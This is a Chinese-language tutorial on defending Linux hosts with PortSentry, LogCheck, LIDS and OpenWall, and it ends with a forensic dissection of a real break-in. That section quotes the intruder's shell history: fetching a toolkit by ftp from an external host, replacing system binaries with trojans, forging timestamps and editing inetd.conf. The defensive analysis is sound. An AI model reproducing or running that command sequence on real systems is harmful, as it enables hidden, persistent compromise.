這篇文章主要是關于適用于Linux的幾種基于主機的入侵檢測系統。特別的,我們將會覆
蓋一些怎么安裝這些軟件包的要素,已經它們的用處和什么時候能夠用到這些東西。
系統安全101
本文將為大家展示一些基礎的系統安全知識。特別的,我假設很多常見的安全措施已經
被用來抵抗來自Internet對主機的入侵。這些安全措施主要是:
防火墻,確定了系統的來自Internet的用戶對哪些TCP或者UDP端口有訪問的權限。例如
:我們通過一些很簡單的Web Server防火墻的規則設置,就可以確定這臺機器只有用來
提供http服務的80端口向用戶開放。
系統是不需要沒有用處的守護進程的。例如:一個Web服務器一般只需要一個正在運行的
進程來服務Web頁面。進程并不是就是和服務與Web頁面相關聯的,譬如RPC/Portmap服務
,NFS服務,X Font服務,DNS域名服務,其他外來的或者是沒有什么用處的應用軟件應
該被關掉或者是禁用。在Red Hat Linux的系統中,通常我們用一種運行等級的編輯器來
進行有關的設置,譬如我們可以用ntsysv 或者tksysv來禁用其中的那些沒有要求的守護
進程。
通過編輯和修改/etc/inetd.conf可以屏蔽一些不用的端口。作為一個典型的默認值,我
們安裝一個新的Linux系統的時候,/etc/inetd.conf默認的打開了很多端口。所有的系
統都應該通過編輯/etc/inetd.conf,刪除或者是注釋掉其中的一些行,用來禁用那些沒
有用處的端口,這是最基本的系統安全行為。
警戒線(Lines of Defense):
圖解一、多層系統安全
這一部分,我們將討論一個多層通道的系統安全問題。當其中一些安全層被破壞的時候
,很多安全層能夠獨立的應用來提供一些額外的防衛。圖1就是一種多層結構的系統安全
模型。
圖表中的每一層都會為自己的上一層提供額外的數據保護。例如:第一層是防火墻,如
果防火墻沒有阻擋住外界的入侵嘗試,那么第二層-端口守護程序就會提供額外的保護。
進一步,里面的安全系統是LIDS和LogCheck程序,在入侵嘗試沒有被第二層截獲的時候
也會進行保護。
監控當前連接
防火墻后的第一防護層是用來監控當前與主機的連接嘗試的軟件包。端口守護程序包(
http://www.psionic.com/abacus/portsentry/ )提供了一些簡潔和有用方式來完成這些
事情。
端口守護(PortSentry)程序的作用
端口守護程序的主要作用監控一些特殊的TCP/IP端口的活動情況。PortSentry監視并報
告一些端口的活動,其中的一種情況可能被選中,包括拒絕進一步的連接嘗試。這是一
種很重要的防護措施,因為一般的黑客在入侵一個系統之前都會將會使用一些工具來探
測系統的漏洞和弱點。察覺到探測器或者是端口掃描,就可以徹底的切斷一些潛在地黑
客進一步的連接嘗試,中止一些帶有入侵意圖的進一步的端口掃描。
安裝PortSentry
對于Red Hat的用戶來說,Red Hat的ftp服務器上的RPM包里面包含了這個程序。這個站
點在全球都有它的鏡像,你可以在www.redhat.com上面查找距離你最近的站點。我還不
能確定.deb格式的軟件包中間是PortSentry這樣的程序,但是我可以確認那里肯定是有
這個軟件的。對于其他Linux用戶來說,通過原碼來安裝這個軟件也是相當地簡單的。
推薦配置
PortSentry有很多運行模式,包括不同的UDP和TCP秘密運行的模式。我選擇的運行機制
是把PortSentry綁定在那些沒有被使用的或者是認為有潛在的入侵可能的TCP端口上。例
如:我將24小時連續的掃描我的web服務器上面的這些端口,port 143 (imap2), port
111 (portmap) 和port 23 (telnet)都是我的Internet系統上沒有使用的TCP端口。你可
以通過這條命令:
portsentry -tcp
在你的系統啟動的時候就使PortSentry進入基本的TCP運行模式。同時要保證PortSentr
y的配置文件portsentry.conf中包含了TCP_PORTS這行配置來掃描你需要進行掃描的端口
。
反應選項
你能通過portsentry.conf中的"Response Options"部分來詳細的說明什么樣的反應是P
ortSentry察覺了一些不期望的連接。通常我會使用ipchains來中斷那些來自于連接的源
方的進一步連接。這個也可以通過portsentry.conf中下面這樣一行來進行配置:
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
在接受來自高端口的掃描行為的時候,可以通過刪除上面一行中的-l這個選項來屏蔽這
些進一步的連接,可以有效的維持系統日志空間。
監視系統日志
諸如防火墻系統、PortSentry這樣的軟件可以有效的監視或者是屏蔽一些端口的不期望
的連接。這樣可以防止最典型的那種"掃描-入侵"的攻擊方式。
當系統需要運行特殊的服務(例如:Apache Web Server,或者是綁定了一個DNS服務)
的時候,同時有黑客破解了這種服務中的一些攻擊點,這些程序就會很不幸運的不能保
持把所有的入侵者拒之門外。綁定運行著一個容易受攻擊的程序的DNS服務器,這些端口
最終總是要被一些黑客通過掃描很廣范圍的機器的特定的一個端口,并且會試圖通過這
個端口來入侵系統。很不幸,防火墻或者是PortSentry程序會將這些入侵嘗試當作正常
的合理的連接。
系統日志檢測(LogCheck)
LogCheck是用來掃描系統日志文件的軟件(http://www.psionic.com/abacus/logcheck
/ )。LogCheck會掃描系統日志文件(在Linux系統中,系統日志文件在/var/log/目錄下
面),同時當系統出現一些異常的時候,LogCheck就會通過Email來通報給管理員。系統
日志文件中的異常的消息通常是表示有一些黑客正在嘗試入侵或者是正在侵入系統。
安裝LogCheck
LogCheck有四個主要的配置文件。在RPM版本中,這幾個配置文件在/etc/logcheck目錄
下面。通常我們只需要配置logcheck.ignore和logcheck.violations.ignore這兩個文件
。我在安裝完LogCheck后的程序一般是這樣的:
允許LogCheck在正常的運行模式下面運行一次,這樣將會一個巨大的輸出文件,不過我
們可以把這個文件刪除算了。
24小時以后讓LogCheck再次運行一次,這次我們會在日志文件的入口處中發現產生了一
些新的東西,同時也是一個很大的但是仍然可以計算大小的文件。仔細的閱讀這個文件
。
在文件的入口處有一些不需要我們關心的特定的字符串,如果這些字符串時一些"違反安
全"的片斷,我們可以將這些字符串片斷加入到logcheck.violations.ignore文件中;或
者當他們是"異常系統事件"的時候,我們就將這些字符串加到logcheck.ignore中。
在折椅歌星期中,每隔12~24小時就重復一下這些步驟。在這個階段中,我們反復的設置
.ignore文件的過濾規則,最后剩下的就是我們的系統真正關心的了。
注意到RPM文件指定LogCheck每小時運行一次,但是我只需要每天運行一次,除非是在特
定的需要監視的系統。這樣可以每天把/etc/cron.hourly/logcheck這個文件拷貝到/et
c/cron中一次。
基于內核的入侵檢測
基于內核的入侵檢測是一種相當巧妙的新型的Linux入侵檢測系統。現在最主要的基于內
核的入侵檢測系統叫做LIDS,并可以從http://www.lids.org/ 下載。
什么是LIDS?
LIDS是一種基于Linux內核的入侵檢測和預防系統。
LIDS的保護目的是防止超級用戶root的篡改系統重要部分的。LIDS主要的特點是提高系
統的安全性,防止直接的端口連接或者是存儲器連接,防止原始磁碟的使用,同時還要
保護系統日志文件。LIDS當然也會適當制止一些特定的系統操作,譬如:安裝sniffer、
修改防火墻的配置文件。
LIDS文檔工程
LIDS比安裝PortSentry和LogCheck要復雜一點,但是很幸運的是,在LIDS的主頁上面有
詳細的安裝和配置手冊。
安裝LIDS
首先,在安裝之前,我們需要大部分最新的LIDS軟件包(我使用的是0.9)和適當的內核
版本。我現在使用的是從Red Hat主頁上下載的2.2.14-12版本的內核,因為其中包含一
些安全補丁。同時你也需要你使用的內核的一些源代碼。
現在的LIDS主要是適用于2.2.14版本的內核。我安裝的在2.2.14的內核的Red Hat Linu
x6.2上面安裝了LIDS。在安裝LIDS之前,我在ftp.redhat.com下載了最新的內核版本,
并且依照http://www.redhat.com/support/docs/...de/kernel-upgra
de.html 安裝了這個內核。
接著的事情就是升級內核源代碼。這里我們是這樣做的:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
然后就是編譯和安裝lidsadm這個程序:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make
make install
生成一個RipeMD-160口令,這個以后將會在安裝進內核的:
lidsadm -P
輸入口令是"anypass",得到秘鑰"d502d92bfead11d1ef17887c9db07a78108859e8"。
接著,我把Redhat的配置文件拷貝到我的結構體系中,在/usr/src/linux目錄下面:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
下面我們就使用下面的命令來安裝LIDS:
cd /usr/src
patch -p0 同時我們應該注意到Red Hat所提供的內核和Linus發布的標準的2.2.14版本的內核有一
些細微的差別,因為其中包含一些修改過的驅動程序。同樣lids-0.9-2.2.14-redhat.p
atch文件也是和LIDS發布的標準的lids-0.9-2.2.14.patch有一些細微的差別,不過可能
后者并不是特別適合于Red Hat系統。
最后,就是配置、編譯和安裝內核了:
cd /usr/src/linux
make menuconfig
make dep; make clean
make
install; make modules; make modules_install
下面的腳本展示了在配置內核的過程中我設置的LIDS配置選項:
--- LIDS features
[ ] Hang up console when raising a securit alert
[ ] Do not execute unprotected programs before sealing LIDS
(60) Authorised time between two identic logs (seconds)
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
(3) Number of attempts to submit password
(3) Time to wait after a fail (seconds)
[ ] Allow any program to switch LIDS protections
[ ] Hide some known processes
[ ] Send security alerts through network
--- Special authorizations
[ ] Allow some known processes to access /dev/mem (xfree, etc.)
[ ] Allow some known processes to access raw disk devices
[ ] Allow some known processes to access io ports
[ ] Allow some known processes to change routes
--- Special UPS
Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"
Allowed processes: "/etc/rc.d/init.d/halt"
看得出,我沒有使用UPS,同時運行的是一個需要能夠遠程訪問的服務器,我就按照上面
的文件進行了配置,但是在實際應用過程中,每個人的系統根據環境不一樣,會有一些
差別。
配置LIDS:
有一條特別要引起注意:在你的系統的下一次重啟之前就應該配置好LIDS!
我們應該使用lidsam來配置LIDS的配置文件/etc/lids.conf,而不能手動的修改。運行
"lidsadm -h"可以獲得一些關于如何使用lidsadm這個程序的幫助。LIDS提供了很多使用
LIDS保護文件的例子,例如:
lidsadm -A -r /sbin 這條命令保護/sbin整個目錄,并且表示只讀。
我首先的LIDS配置文件應該是這樣的:
lidsadm -Z
lidsadm -A -r /usr/bin
lidsadm -A -r /bin
lidsadm -A -r /usr/sbin
lidsadm -A -r /sbin
lidsadm -A -r /usr/X11R6/bin
lidsadm -A -r /etc/rc.d
lidsadm -A -r /etc/sysconfig
一旦配置了LIDS的配置文件,就應該修改系統的啟動文件保證在系統啟動的時候就能運
行LIDS,這樣就能有效的在內核中啟動LIDS的作用。一般我都是把lidsadm加到/etc/rc
.d/rc.local的末尾,這樣能夠保證LIDS的功能不會妨礙系統的其他應用程序的正常啟動
。下面就是我加在/etc/rc/d/rc.local中用來啟動LIDS的腳本:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \
-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \
+INIT_CHILDREN_LOCK
配置lilo
我們知道,使用Redhat的RPMS升級系統內核以后需要重新配置lilo.conf來保證編譯加載
過LIDS的新內核能夠正常的啟動。在下次重啟之后,LIDS將會在系統中運行,不過如果
你需要停止LIDS而執行一些系統的任務,就應該按照下面的命令進行:
/sbin/lidsadm -S -- -LIDS或者/sbin/lidsadm -S -- -LIDS_GLOBAL
你需要提供LIDS的口令,當時在編譯內核的時候在內核中加入了RipeMD-160格式。
不知道你是否注意到了,在shutdown的腳本中,很多腳本都不能正常的工作。最終的sh
utdown腳本/etc/rc.d/init.d/halt將會停止所有的進程和卸載文件系統。由于在文件r
c.local中 "+INIT_CHILDREN_LOCK"的保護作用,其他的進程都沒有權限來殺掉init()的
其他子進程。同時每隔10分鐘,你就會收到一個關于"rmmod \as"不能卸載模塊的出錯信
息。這個主要是由于LIDS啟動以后"-CAP_SYS_MODULE"的保護使得模塊的插入或者卸載出
現了毛病。我們可以刪除/etc/cron.d/kmod這個文件來防止出錯信息繼續發生。
LIDS能夠保護什么?
快速的瀏覽LIDS的文檔就可以了解LIDS的一系列特性。而我認為下面的這些特性是最重
要的:
CAP_LINUX_IMMUTABLE 當文件和外那間系統被標識"immutable"防止被寫;
CAP_NET_ADMIN 防止篡改網絡配置(例如:防止路由表被修改);
CAP_SYS_MODULE 防止內核模塊被插入或者移除;
CAP_SYS_RAWIO 防止損壞磁盤或者設備I/O;
CAP_SYS_ADMIN 防止大范圍的使用其他系統功能;
INIT_CHILDREN_LOCK which prevents child processes of the init() master pro
cess from being tampered with.
無論在哪個點,上面這些特性都能夠通過命令"lidsadm -I"來啟動,通過"lidsadm -S"
來禁用(可以允許真正的系統管理員來進行系統配置),同時提供已經安裝在內核中的
LIDS口令(是通過RipeMD-160加密的)。
剖析一次入侵
最近我一直忙于檢查一些被黑過的機器,來推斷一些被入侵的原因還有核實黑客對系統
破壞。很幸運,一些黑客不是特別的聰明,在入侵一些系統之后沒有設法徹底的抹掉痕
跡。當黑客把一些系統守護進程的緩沖區溢出以后就可以獲得root權限,這個時候就是
主機被入侵了(事實上是不可能發生的,但是安裝Linux系統的人忘記了打上RedHat最新
的關于緩沖區溢出的補丁程序,并且讓系統一直運行著)。當然一些黑客也不夠小心,
當他們侵入主機后,很急切的獲得了shell,但是他們經常沒有考慮到BASH的命令將會被
存入系統日志文件中,簡單的閱讀/.bash_history就可以了解黑客到底怎么機器上面作
了一些什么事情。這個文件我們可以看看(為了更加簡單我們做過一些細微的修改):
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
通讀這些內容,我們就可以了解下面的一些動作:
系統中建立了一個名字異常的目錄(/usr/lib),接著黑客telnet到了自己的主機上面
(200.192.58.201,是Brazil某個地方的撥號用戶),同時下載了一套黑客工具。這些
黑客工具尸沒有經過壓縮的,中間的一些特洛伊二進制程序被安裝到了系統中了,這些
特洛亦程序覆蓋了系統的netstat,ps, tcpd, syslogd和pstree命令。這些程序是用
來報告系統有那些進程正在運行,那些端口是打開的。
我們從中能學到什么呢?
首先,LIDS是不能阻止一次入侵的,黑客連接上主機通過緩沖區溢出的方式獲得系統的
root權限。
一旦系統沒有黑客入侵,我們看看LIDS是如何使破壞降到最低的:
LIDS通過CAP_LINUX_IMMUTABLE選項可以防止特洛亦程序被寫入到/bin,/usr/bin, /u
sr/sbin和/usr/lib目錄中。這些目錄我們一般都會標識為不可變的(chattr +i),因
而也不會被修改。我們可以注意到,就算不使用LIDS,也可以通過chattr +I命令來標識
目錄為不可變的,但是如果是通過LIDS以后,即使是root也不能篡改不可變標識位。類
似的,如果文件通過chattr +I被標識為,touck -t這個命令也會失敗。甚至第一行的"
mkdir /etc/lib"這個命令也會失敗,如果我們標識文件為不可讀的話。
LIDS不能防止黑客入侵,但是可以防止入侵的黑客在侵入后進行很大的系統破壞。一個
后門程序可以被安裝上系統,但是沒有特洛亦版本的ps,netstat和pstree能夠很早的發
現這個后門進程,然后kill之。如果沒有LIDS,我們不可能知道黑客通過這個后門程序
會做一些什么事情,我們唯一能夠進行挽回的工作就是重裝系統。
OpenWall和LIDS:額外的層
另外一個和LIDS相似的系統是OpenWall工程(http://www.openwall.com/linux/ )。Op
enWall工程在很多地方和LIDS不一樣,有一個OpenWall的特別的補丁就是使棧區為不可
執行。下面是摘自OpenWall的README文檔里面的申明:
大多數緩沖區溢出攻擊都是基于覆蓋一些隨意的程序片段中的函數返回值在堆棧中的地
址,如果堆棧為不可執行,那么緩沖區溢出的弱點將會變得很難攻擊。另外一種緩沖區
溢出的方式是在libc中指出一個函數的返回地址,通常是system()。這個補丁通過修改
mmap()化的共享庫,使其總是一個零字節的文件。這樣使其不能再指定一些數據,在很
多攻擊中不得不使用ASCIIZ字符串。
最近,在LIDS的網上上有一些完整的LIDS+OpenWall的內核補丁,這樣可以提供LIDS和
OpenWall都具備的特性。
總結
在Linux系統中,通過使用這一系列的多層的安全措施,可以防止很大范圍的攻擊,同時
還可以防止入侵或者篡改。系統被黑客入侵口就是網絡接口,在網絡接口,系統內核上
我們都可以防止他人的入侵。
意識到系統中的一些潛在的安全漏洞。任何運行在系統上的守護進程或者服務,不管是
root用戶還是非root用戶運行的,都能夠成為一個潛在的安全威脅。充分準備好面對這
些威脅
